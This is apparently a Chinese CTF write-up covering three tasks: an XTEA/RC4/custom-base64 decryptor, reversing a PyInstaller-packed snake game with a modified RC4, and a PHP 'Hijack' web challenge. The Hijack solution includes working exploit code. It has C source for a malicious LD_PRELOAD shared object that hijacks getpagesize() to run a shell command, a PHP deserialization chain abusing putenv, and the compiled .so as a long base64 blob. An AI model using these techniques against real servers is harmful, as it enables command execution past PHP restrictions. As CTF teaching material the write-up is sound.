void xtea_decipher(unsigned int num_rounds, uint32_t v[], uint32_t const key[4]) {
for (int j = 0; j < 16; j += 2) {
uint32_t v0 = v[j], v1 = v[j+1], delta = 0x9E3779B9, sum = delta * num_rounds;
for (int i = 0; i < num_rounds; i++) {
v1 -= (((v0 << 4) ^ (v0 >> 5)) + v0) ^ (sum + key[(sum >> 11) & 3]);
sum -= delta;
v0 -= (((v1 << 4) ^ (v1 >> 5)) + v1) ^ (sum + key[sum & 3]);
}
v[j] = v0; v[j+1] = v1;
}
}
void changeBase64Table(unsigned char* base64_table) {
int randPosA = 0, randPosB = 0;
for (int i = 0; i < 100; i++) {
randPosA = rand() % 64;
randPosB = rand() % 64;
swap(&base64_table[randPosA], &base64_table[randPosB]);
}
}
void generateKey(unsigned char* rc4_key,unsigned char* xtea_key,int len) {
for (int i = 0; i < len; i++) {
rc4_key[i] = rand() % 0xff;
xtea_key[i] = rand() % 0xff;
}
}
int main() {
//初始化
unsigned char base64_table[64] = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";
unsigned char encflag[64]={ 0x59,0x1b,0xfd,0xb4,0x6b,0xb8,0xbe,0xd9,0xb3,0xd3,0x77,0xd6,0xf0,0x65,0x5f,0x18,0xa0,0x9d,0x3a,0x53,0x6d,0x4a,0x7b,0x26,0x74,0x3a,0x9c,0x4e,0x20,0x43,0x19,0xd8,0x72,0xed,0x95,0xb5,0x9c,0x5,0x22,0x56,0xcb,0x7a,0x11,0x91,0x9f,0x7a,0xbc,0xc,0x4a,0x69,0x6d,0xce,0x3d,0xb4,0xab,0x29,0x61,0xfa,0x62,0x32,0xb4,0xec,0x4c,0xb6};
int encflag_len = 64,flag_len=64/4*3, xtea_rounds = 100,rc4_key_len=16;
unsigned char rc4_key[16];
unsigned int xtea_key[4] = { 0 };
//伪随机数换表和生成key
srand(0x114514);
changeBase64Table(base64_table);//换表
srand(0x1919810);
generateKey(rc4_key, (unsigned char*)xtea_key, 16);//key均为16字节
//解密
xtea_decipher(xtea_rounds, encflag, xtea_key);
RC4_enc_dec(encflag, encflag_len, rc4_key, rc4_key_len);
unsigned char* decflag=base64_decode(base64_table,encflag, encflag_len);
printf("flag is:n");
for (int i = 0; i < flag_len; i++) {
printf("%c", decflag[i]);
}
printf("n");
system("pause");
return 0;
}
snake
解题过程
python打包的exe首先解包,首先你得需要pyinstxtractor.py文件,上github直接下了
然后在解包出来的文件夹中找到对应exe名字的snack文件uncompyle6 snack.pyc > snack.py,打开反编译之后的snack.py文件,你就会发现有问题
010查看snack.pyc之后发现Magic头被擦除,这边需要去解包出来后的base_library压缩包中找,从base_library中随便找一个pyc用010打开,把魔术头拼到snack中去就行
然后找个在线网站反编译一下或者直接decompyle3 snake.pyc也行,源码
# Visit https://www.lddgo.net/string/pyc-compile-decompile for more information
# Version : Python 3.8
import pygame
import random
import key
def initialize(key):
key_length = len(key)
S = list(range(256))
j = 0
for i in range(256):
j = (j + S[i] + key[i % key_length]) % 256
S[i] = S[j]
S[j] = S[i]
return S
def generate_key_stream(S, length):
i = 0
j = 0
key_stream = []
for _ in range(length):
i = (i + 1) % 256
j = (j + S[i]) % 256
S[i] = S[j]
S[j] = S[i]
key_stream.append(S[(S[i] + S[j]) % 256])
return key_stream
def decrypt(data, key):
S = initialize(key)
key_stream = generate_key_stream(S, len(data))
decrypted_data = None((lambda .0 = None: [ i ^ data[i] ^ key_stream[i] for i in .0 ])(range(len(data))))
return decrypted_data
pygame.init()
WINDOW_WIDTH = 800
WINDOW_HEIGHT = 600
SNAKE_SIZE = 20
SNAKE_SPEED = 20
WHITE = (255, 255, 255)
BLACK = (0, 0, 0)
RED = (255, 0, 0)
window = pygame.display.set_mode((WINDOW_WIDTH, WINDOW_HEIGHT))
pygame.display.set_caption('贪吃蛇')
font = pygame.font.Font(None, 36)
snake = [
(200, 200),
(210, 200),
(220, 200)]
snake_direction = (SNAKE_SPEED, 0)
food = ((random.randint(0, WINDOW_WIDTH - SNAKE_SIZE) // SNAKE_SIZE) * SNAKE_SIZE, (random.randint(0, WINDOW_HEIGHT - SNAKE_SIZE) // SNAKE_SIZE) * SNAKE_SIZE)
key_bytes = bytes((lambda .0: [ ord(char) for char in .0 ])(key.xor_key))
data = [
101,
97,
39,
125,
218,
172,
205,
3,
235,
195,
72,
125,
89,
130,
103,
213,
120,
227,
193,
67,
174,
71,
162,
248,
244,
12,
238,
92,
160,
203,
185,
155]
decrypted_data = decrypt(bytes(data), key_bytes)
running = True
if running:
window.fill(BLACK)
for event in pygame.event.get():
if event.type == pygame.QUIT:
running = False
elif event.type == pygame.KEYDOWN or event.key == pygame.K_UP:
snake_direction = (0, -SNAKE_SPEED)
elif event.key == pygame.K_DOWN:
snake_direction = (0, SNAKE_SPEED)
elif event.key == pygame.K_LEFT:
snake_direction = (-SNAKE_SPEED, 0)
elif event.key == pygame.K_RIGHT:
snake_direction = (SNAKE_SPEED, 0)
continue
snake_head = (snake[0][0] + snake_direction[0], snake[0][1] + snake_direction[1])
snake.insert(0, snake_head)
snake.pop()
if snake[0] == food:
food = ((random.randint(0, WINDOW_WIDTH - SNAKE_SIZE) // SNAKE_SIZE) * SNAKE_SIZE, (random.randint(0, WINDOW_HEIGHT - SNAKE_SIZE) // SNAKE_SIZE) * SNAKE_SIZE)
snake.append(snake[-1])
if snake[0][0] < 0 and snake[0][0] >= WINDOW_WIDTH and snake[0][1] < 0 and snake[0][1] >= WINDOW_HEIGHT or snake[0] in snake[1:]:
running = False
for segment in snake:
pygame.draw.rect(window, WHITE, (segment[0], segment[1], SNAKE_SIZE, SNAKE_SIZE))
pygame.draw.rect(window, RED, (food[0], food[1], SNAKE_SIZE, SNAKE_SIZE))
score_text = font.render(f'''Score: {len(snake)}''', True, WHITE)
speed_text = font.render(f'''Speed: {SNAKE_SPEED}''', True, WHITE)
window.blit(score_text, (10, 10))
window.blit(speed_text, (10, 40))
score = len(snake)
if score >= 9999:
flag_text = font.render('Flag: ' + decrypted_data.decode(), True, WHITE)
window.blit(flag_text, (10, 70))
pygame.display.update()
pygame.time.Clock().tick(10)
continue
pygame.quit()
key从下图exe解包之后的PYZ文件夹中找
找个在线的
这里是魔改了RC4 魔改逻辑就是多加了一个循环下标 i 的异或
import pygame
import random
key='V3rY_v3Ry_Ez'
def initialize(key):
key_length = len(key)
S = list(range(256))
j = 0
for i in range(256):
j = (j + S[i] + key[i % key_length]) % 256
S[i], S[j] = S[j], S[i]
return S
def generate_key_stream(S, length):
i = 0
j = 0
key_stream = []
for _ in range(length):
i = (i + 1) % 256
j = (j + S[i]) % 256
S[i], S[j] = S[j], S[i]
key_stream.append(S[(S[i] + S[j]) % 256])
return key_stream
def decrypt(data, key):
S = initialize(key)
key_stream = generate_key_stream(S, len(data))
decrypted_data = bytes([i^data[i] ^ key_stream[i] for i in range(len(data))])
return decrypted_data
pygame.init()
key_bytes = bytes([ord(char) for char in key])
data = [0x65,0x61,0x27,0x7D,0xDA,0xAC,
0xCD,0x03,0xEB,0xC3,0x48,0x7D,
0x59,0x82,0x67,0xD5,0x78,0xE3,
0xC1,0x43,0xAE,0x47,0xA2,0xF8,
0xF4,0x0C,0xEE,0x5C,0xA0,0xCB,
0xB9,0x9B]
print(decrypt(bytes(data), key_bytes))
Hijack
解题过程
生成恶意.so文件
#include <stdlib.h>
#include <string.h>
void payload() {
system("cat /f*");
}
int getpagesize() {
if (getenv("LD_PRELOAD") == NULL) { return 0; }
unsetenv("LD_PRELOAD");
payload();
}
gcc -shared -fPIC Harder.c -o Harder.so
cat Harder.so |base64 >1.txt
pop1:
<?php
highlight_file(__FILE__);
//error_reporting(E_ALL);
//ini_set('display_errors', 1);
//system("cat *");
function filter($a)
{
$pattern = array(''', '"','%','(',')',';','bash');
$pattern = '/' . implode('|', $pattern) . '/i';
if(preg_match($pattern,$a)){
die("No inject");
}
return $a;
}
class Env{
public $key;
public $value;
public $math;
public function __toString()
{
$key=filter($this->key);
$value=filter($this->value);
putenv("$key=$value");
system("cat robots.txt");
}
public function __wakeup()
{
echo "cccc";
if (isset($this->math->flag))
{
echo "YesYes";
} else {
echo "YesYesYes";
}
}
}
class DIFF{
public $callback;
public $back;
private $flag;
public function __construct()
{
$this->callback = new FUN;
$this->callback->value = "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AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEiD7AhIiwXFLwAASIXAdAL/0EiDxAjDAAAAAAAAAAAA/zXKLwAA/yXMLwAADx9AAP8lyi8AAGgAAAAA6eD/////JcIvAABoAQAAAOnQ/////yW6LwAAaAIAAADpwP////8lsi8AAGgDAAAA6bD/////JWovAABmkAAAAAAAAAAASI09oS8AAEiNBZovAABIOfh0FUiLBS4vAABIhcB0Cf/gDx+AAAAAAMMPH4AAAAAASI09cS8AAEiNNWovAABIKf5IifBIwe4/SMH4A0gBxkjR/nQUSIsF/S4AAEiFwHQI/+BmDx9EAADDDx+AAAAAAPMPHvqAPS0vAAAAdStVSIM92i4AAABIieV0DEiLPQ4vAADoWf///+hk////xgUFLwAAAV3DDx8Aww8fgAAAAADzDx766Xf///9VSInlSI0FvA4AAEiJx+j0/v//kF3DVUiJ5UiNBa4OAABIicfozv7//0iFwHUHuAAAAADrGUiNBZMOAABIicfo4/7//7gAAAAA6Mn+//9dwwAAAEiD7AhIg8QIwwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABjYXQgL2YqAExEX1BS